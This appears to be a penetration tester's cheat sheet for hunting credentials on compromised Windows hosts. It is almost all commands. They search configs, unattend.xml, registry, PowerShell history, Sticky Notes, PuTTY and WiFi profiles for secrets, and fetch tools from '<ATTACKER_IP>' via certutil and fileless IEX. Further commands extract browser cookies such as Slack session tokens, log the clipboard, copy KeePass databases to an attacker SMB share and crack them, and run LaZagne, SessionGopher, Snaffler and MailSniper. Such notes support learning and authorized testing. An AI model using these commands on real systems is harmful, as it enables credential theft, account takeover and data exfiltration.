PRIMARY CATEGORY → CREDENTIAL HUNTING • WINDOWS PRIVESC • WINDOWS CREDENTIALS
Application Configuration Files
e.g. IIS web.config file
Findstr
CMD & PS
for %D in (C:\Users C:\Scripts C:\Temp C:\Windows\Temp) do @findstr /S /I /N /P /C:"password" /C:"passwd" /C:"pwd" /C:"secret" /C:"token" /C:"key" /C:"credential" "%D\*.txt" "%D\*.ini" "%D\*.cfg" "%D\*.config" "%D\*.xml" "%D\*.git" "%D\*.ps1" "%D\*.yml" 2>nulPS
Better choice 😊
Get-ChildItem -Path C:\Users,C:\Scripts,C:\Temp,C:\Windows\Temp -Recurse -File -Include *.txt,*.ini,*.cfg,*.config,*.xml,*.git,*.ps1,*.yml -ErrorAction SilentlyContinue | Select-String -Pattern 'password','passwd','pwd','secret','token','key','credential' -SimpleMatch | Select-Object Path, LineNumber, LineUnattended Installation Files
e.g. auto{unattend.xml} file
Get-ChildItem -Path 'C:\' -Recurse -Filter '*.xml' -ErrorAction SilentlyContinue | ? { $_.FullName -match '.*unattend.xml.*' } | Select -ExpandProperty FullNameunattend.xml
<?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="specialize"> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <AutoLogon> <Password> <Value>local_4dmin_p@ss</Value> <PlainText>true</PlainText> </Password> <Enabled>true</Enabled> <LogonCount>2</LogonCount> <Username>Administrator</Username> </AutoLogon> <ComputerName>*</ComputerName> </component> </settings>
Powershell History File
Starting with PS 5.0 in Windows 10, PS stores command history file to the following path
C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtVerifying Powershell History Save Path
PS
(Get-PSReadLineOption).HistorySavePathReading Powershell History File
Get-Content (Get-PSReadLineOption).HistorySavePathReading all existing Powershell History Files
Once we compromise the entire system, we can issue the following command in order to look for sensitive information within all existing PS history files of any user
Get-ChildItem -Path 'C:\Users' -Directory | % { Get-Content C:\Users\$( $_.Name )\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue }Powershell Credential Objects
Windows Sticky Notes
Data stored in a SQLITE Database
Location
C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqliteInformation Extraction - Windows
Usage
- Downloading the Powershell Module
From the attacker ⚔️
git clone https://github.com/RamblingCookieMonster/PSSQLitezip -rv PSSQLite.zip PSSQLite- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPEcertutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/PSSQLite.zip'Expand-Archive -Path .\PSSQLite.zip -DestinationPath .Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PSSQLite\PSSQLite\PSSQLite.psd1Usage
$db = '<SQLITE_FILE>'Invoke-SqliteQuery -Database $db -Query 'Select Text FROM Note' | ft -wrapInformation Extraction - UNIX-Like
strings '<SQLITE_FILE>'Other Interesting Files
PS
Get-ChildItem -Path 'C:\' -Recurse -Include '*.kdbx', '*.vmdk', '*.vhd', '*.vhdx', '*.ppk' -ErrorAction SilentlyContinue | Select -ExpandProperty FullNameOther Interesting Files
%SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\iis6.log %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts C:\ProgramData\Configs\* C:\Program Files\Windows PowerShell\*
Stored Credentials on Windows Credential Manager
Current User Context
Enumeration
Cmdkey
cmdkey.exe /listReusing Stored Credentials
Runas
runas.exe /savecred /user:'<DOMAIN>\<USER>' <PROCESS>e.g.
runas.exe /savecred /user:'DOMAIN.INTERNAL\john.doe' powershell.exe
Browser Credentials
e.g. Cookies, Saved Logins and so on
Chrome
All stored credentials
- Setup
Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpChrome.exe'Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
New-Item -Type Directory -Path "$env:TEMP\LPE" -Force
cd "$env:TEMP\LPE"certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/SharpChrome.exe'- Usage
.\SharpChrome.exe logins /unprotectCookie Extraction
The Windows Data Protection API ( DPAPI ) encrypts all cookie values stored within a given SQLITE file located in the following path
%LOCALAPPDATA%\Google\Chrome\UserData\Default\Network\CookiesTherefore, just as for all information that is encrypted using this mechanism, in order to be able to decrypt it, we must carry out the decryption routine from the session of the user we compromised
- Setup
Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1'Copying the Cookie File to the tool’s expected location
From the target 🎯
Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"Transferring it to the target
Fileless
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-SharpChromium.ps1)- Usage
Invoke-SharpChromium -Command 'cookies <HOST>'e.g.
Invoke-SharpChromium -Command 'cookies slack.com'
Sensitive Information Extraction from Dictionary Files
e.g. Google Chrome Custom Dictionary
PS
Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Custom Dictionary.txt" | Select-String -Pattern '(passwd|pass|key|token)'Firefox
Cookie Extraction
Firefox Cookies’ Path
%APPDATA%\Mozilla\Firefox\Profiles\*.default-release\cookies.sqliteUnlike [[#Chrome#Cookie Extraction|Chrome]], Firefox does not use any kind of encryption to protect the SQLITE database where cookies are stored, so we can proceed as follows to retrieve all of them
- Setting up an SMB Server
From the attacker ⚔️
smbserver.py -smb2support -user '<USER>' -passwd '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'From the target 🎯
net use X: "\\<ATTACKER_IP>\<SHARE>" /USER:<USER> '<PASSWD>'- Copying Firefox Cookie Database
From the target 🎯
Copy-Item -Path "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite" -Destination 'X:'- Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/cookieextractor.py'- Running the script above
python3 cookieextractor.py --dbpath '<SQLITE_COOKIE_FILE>' --host discorde.g.
python3 cookieextractor.py --dbpath ./cookies.sqlite --host slack
IM Clients
Instant Messaging
Slack
If the given account is using some sort of 2FA or we just do not know the credentials, we can try to steal the user’s cookies to log in to the cloud-based client
This platform sets to any logged-in user a cookie named d, whose value stores the user’s authentication token
So, if we manage to retrieve this cookie by performing Browser Credential Extraction, we could authenticate as the given user account against this platform
User’s Clipboard
Real-time Monitoring
Setup
- Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/inguardians/Invoke-Clipboard/raw/refs/heads/master/Invoke-Clipboard.ps1'- Transferring it to the target
Fileless
From the attacker ⚔️
python3 -m http.server 80From the Target 🎯
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Clipboard.ps1)Usage
Invoke-ClipboardLoggerPassword Managers
KeepassXC
Enumeration
From the target 🎯
PS
Get-ChildItem -Path 'C:\' -Recurse -Include '*.kdb', '*.kdbx' -ErrorAction SilentlyContinue | Select -ExpandProperty FullNameTransferring the Keepass file to the attacker
From the attacker ⚔️
smbserver.py -smb2support -user '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'From the target 🎯
net use X: \\<ATTACKER_IP>\<SHARE> /USER:<USER> <PASSWD>Copy-Item -Path <KEEPASS_FILE> -Destination X: -ForceExtracting a crackable Hash from the Keepass Database File
From the attacker ⚔️
- Downloading the Python Script
curl --silent --location --request GET --remote-name 'https://gist.githubusercontent.com/HarmJ0y/116fa1b559372804877e604d7d367bbc/raw/c0c6f45ad89310e61ec0363a69913e966fe17633/keepass2john.py'- Installing Python2.7
curl https://pyenv.run | bashexport PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"pyenv install 2.7.18- Creating a Virtual Environment
pyenv shell 2.7.18 && pip install virtualenv
virtualenv .venv
. !$/bin/activate- Running the script
python keepass2john.py '<KEEPASS_FILE>' > keepass.hashTrying to crack the given hash
- John the Ripper
john --wordlist=<WORDLIST> keepass.hash- Hashcat
hashcat --force -O --attack-mode 0 --hash-type 13400 keepass.hash '<WORDLIST>'Microsoft Exchange Inbox
AD Environment
From the attacker 🎯
Setup
Downloading the Powershell Script
IEX (New-Object Net.WebClient).downloadString('https://github.com/dafthack/MailSniper/raw/refs/heads/master/MailSniper.ps1')Usage
Invoke-GlobalMailSearch
Invoke-GlobalMailSearch -ImpersonationAccount '<USER>' -ExchHostname '<EXCHANGE_SERVER>' -OutputCsv <OUTPUT_FILE>.csvCurrent User Mailbox
Invoke-SelfSearch
Invoke-SelfSearch -Mailbox '<USER>@<DOMAIN>'Credentials on Windows Registry
Windows Autologon Credentials
Workflow
The Windows Autologon Credentials are stored within the following registry hive in plain text
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonIn order to enable a system autologon, the registry hive above must have the following values
AdminAutoLogon→ Determines whether autologon is enabled or not
1 → Enabled
0 → Disabled
-
DefaultUserName→ User account that will automatically log on -
DefaultPassword→ Password for the user account specified previously
Important
If it’s mandatory to set up Autologon, it’s always recommended to use Autologon.exe from SysInternals, which encrypts and stores the given password as an LSA Secret
Listing Windows Autologon Credentials
CMD & PS
reg query 'HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'PS
Get-ItemProperty -Path 'HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon'Putty
Workflow
Credentials related to a certain PUTTY session are stored in the registry hive below
Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>Bear in mind that the existing keys within the given registry hive are tied to the user that configured and saved the session
Therefore, in order to have READ permissions over them, we would need to log in as the principal in question and search for it within HKCU ( Hive Key Current User )
Another way would be to search directly on HKEY_USERS if we achieve to compromise the entire system first
Enumerating existing PUTTY Sessions
CMD & PS
reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions'PS
Get-ItemProperty -Path 'HKCU:Software\SimonTatham\PuTTY\Sessions'Listing Credentials tied to the given PUTTY session
CMD & PS
reg query 'HKCU\Software\SimonTatham\PuTTY\Sessions\<SESSION>'PS
Get-ItemProperty -Path 'HKCU:Software\SimonTatham\PuTTY\Sessions\<SESSION>'WiFi Credentials
It only applies if the target has a Wireless Network Card
Listing recently connected Wireless Networks
Privileged access required ( i.e. System Compromised )
netsh wlan show profileRetrieving Saved Wireless Passwords
Pre-shared Key ( Key Content )
netsh wlan show profile '<WIRELESS_NETWORK_SSID>' key=clearCommand Output
...<SNIP>... Profile <WIRELESS_NETWORK_SSID> on interface Wi-Fi: Applied: All User Profile Security settings ----------------- Key Content : ILFREIGHTWIFI-CORP123908! ...<SNIP>...
Automated Enumeration and Extraction
Lazagne
start lazagne.exe allVerbose Output
start lazagne.exe -vv allSessionGopher
Setup
- Downloading the Powershell Script
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/Arvanaghi/SessionGopher/raw/refs/heads/master/SessionGopher.ps1'- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/SessionGopher.ps1')Usage
From the target 🎯
Invoke-SessionGopher -Target (hostname)Snaffler
It shines by enumerating AD Shares instead of local files
Setup
- Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --remote-name 'https://github.com/SnaffCon/Snaffler/releases/download/1.0.244/Snaffler.exe'- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
New-Item -Type Directory -Path "$env:TEMP\LPE" -Force
cd "$env:TEMP\LPE"certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/Snaffler.exe'Usage
.\Snaffler.exe -s -d '<DOMAIN>' -o '<OUTPUT_FILE>.tsv' -v data -y